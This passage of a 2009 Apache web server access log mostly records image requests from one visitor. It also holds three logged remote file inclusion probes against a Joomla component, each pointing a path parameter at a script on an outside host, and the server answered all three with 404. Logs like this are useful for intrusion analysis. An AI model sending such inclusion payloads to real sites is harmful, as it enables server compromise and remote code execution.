85.105.85.50 - - [12/May/2009:03:49:02 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD84F85F0D8008D8C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:49:03 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD84F85F0D8008D8C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
110.45.144.106 - - [12/May/2009:03:49:03 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:49:03 -0400] "GET /logs/access_log.Q108100600/components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:49:03 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.105.85.50 - - [12/May/2009:03:49:03 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD84F85F0D8008D8C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:49:03 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD84F85F0D8008D8C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:49:03 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD84F85F0D8008D8C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:49:03 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD84F